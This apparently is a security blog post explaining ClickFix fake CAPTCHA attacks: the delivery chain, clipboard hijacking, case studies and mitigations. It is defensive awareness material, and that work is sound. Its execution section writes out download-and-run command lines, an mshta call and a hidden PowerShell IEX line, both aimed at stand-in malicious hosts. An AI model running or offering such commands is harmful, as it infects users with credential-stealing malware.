ClickFix Fake CAPTCHA Attacks: How Cybercriminals Exploit User Trust to Deliver Malware

Not every CAPTCHA is a guardian, some are gateways for cyber threats.

In the ever evolving landscape of cyber threats, attackers continually devise innovative methods to exploit user trust. One such emerging tactic is the ClickFix fake CAPTCHA attack, a sophisticated social engineering technique that deceives users into executing malicious code under the guise of routine verification processes.

Understanding ClickFix Fake CAPTCHA Attacks

What is ClickFix?

ClickFix is a social engineering strategy that manipulates users into executing malicious commands by presenting them with fake error messages or verification prompts. These prompts often mimic legitimate system messages or security checks, such as CAPTCHAs, to gain user trust.

The Role of Fake CAPTCHAs

In this variant, attackers create counterfeit CAPTCHA challenges resembling those from trusted services like Google reCAPTCHA. Upon interaction, users are instructed to perform actions like pressing Windows (⊞) + R and pasting a pre-copied command, which leads to the execution of malicious scripts

Technical Breakdown of the Attack

Initial Access - Website Compromise or Malicious Ad Injection
1. The attacker compromises a legitimate website or leverages malvertising to inject JavaScript based redirectors.
2. This script detects certain user characteristics (like OS, browser, geolocation) to filter and target only real users, avoiding bots or sandboxed environments.
3. Once a target is deemed viable, the script redirects the user to a fake CAPTCHA page, often hosted on a domain designed to resemble a legitimate service (secure-check[.]live, browser-defense[.]com, etc.).
Deceptive Page Load - Fake CAPTCHA Interface
1. The attacker displays a visually convincing CAPTCHA widget, resembling services like Google reCAPTCHA.
2. Behind the scenes, no actual CAPTCHA functionality exists, it’s just static HTML/CSS/JS to mimic the visual and gain trust.
3. Once the user clicks the checkbox or interacts with the CAPTCHA, it triggers another stage of social engineering.
Social Engineering Execution - Clipboard Manipulation
1. Immediately after the user “completes” the CAPTCHA, a JavaScript navigator.clipboard.writeText() function is triggered.
2. This copies a PowerShell or mshta command to the user’s clipboard without their awareness.
3. Simultaneously, the page displays fake error messages or verification failures prompting the user:
  1. "To verify you are human, press Windows + R, then press Ctrl + V and hit Enter."
4. Users, tricked by the authoritative-looking CAPTCHA and message, proceed to do exactly that.
Malicious Execution – Local LOLBIN Exploitation
1. The clipboard contains a command such as:
  1. mshta.exe http://malicious-domain[.]xyz/payload.hta
2. Or a more obfuscated version:
  1. powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://badactor[.]site/script.ps1')"
3. What's happening here:
  1. mshta.exe is a Living Off The Land Binary (LOLBIN) built into Windows that can execute remote HTML Application (HTA) files.
  2. The HTA file usually contains VBScript or JScript that:
    - Downloads and runs a secondary payload (EXE or DLL)
    - Installs info-stealers, keyloggers, or RATs like Lumma, RedLine, or AsyncRAT.
    - Establishes persistence (e.g., via registry run keys, scheduled tasks).
Post-Exploitation – Malware Activities
1. Once the malware is in, the threat actor can:
  1. Exfiltrate browser-stored credentials, session cookies, and saved autofill data.
  2. Harvest system info, like OS, CPU, installed software, etc.
  3. Establish persistence through startup folders, registry keys, or scheduled tasks.
  4. Use C2 (Command and Control) to download additional payloads or turn the device into a bot in a larger botnet.

Real-World Case Studies

Case Study 1: ClearFake Campaign

In May 2024, the ClearFake threat group compromised over 9,300 websites, injecting them with malicious code that displayed fake CAPTCHA prompts. Users who followed the provided instructions inadvertently installed malware like Lumma Stealer and Vidar Stealer.

Case Study 2: GitHub Phishing Incident

In September 2024, attackers targeted GitHub users by creating fake issues that claimed vulnerabilities in their code. These issues redirected users to fake CAPTCHA pages, leading to the installation of Lumma Stealer upon execution of the provided commands.

Threat actors rotate domains and infrastructure frequently, often using bulletproof hosting providers.
They obfuscate HTA and PowerShell scripts with Base64 encoding, string concatenation, and variable trickery to evade detection.
In some campaigns, the fake CAPTCHA itself is hosted via legitimate services like GitHub Pages or Netlify, adding legitimacy to the URL.

Mitigation Strategies

User Education: Inform users about the dangers of executing unsolicited commands and the existence of fake CAPTCHA attacks.
Technical Controls:
- Endpoint Protection: Deploy security solutions that can detect and block the execution of malicious scripts and the use of LOLBINs like mshta.exe.
- Network Monitoring: Monitor for unusual outbound connections, especially those initiated by processes like mshta.exe.
Email and Web Filtering: Implement filters to block access to known malicious domains and prevent phishing emails from reaching users.

The ClickFix fake CAPTCHA attack exemplifies the evolving nature of social engineering threats. By exploiting user trust in familiar verification processes, attackers can deliver malware with alarming efficiency. Awareness, education, and robust security measures are crucial in defending against such deceptive tactics.

Happy cyber-exploration! 🚀🔒

Note: Feel free to drop your thoughts in the comments below - whether it's feedback, a topic you'd love to see covered, or just to say hi! Don’t forget to join the forum for more engaging discussions and stay updated with the latest blog posts. Let’s keep the conversation going and make cybersecurity a community effort!

-AJ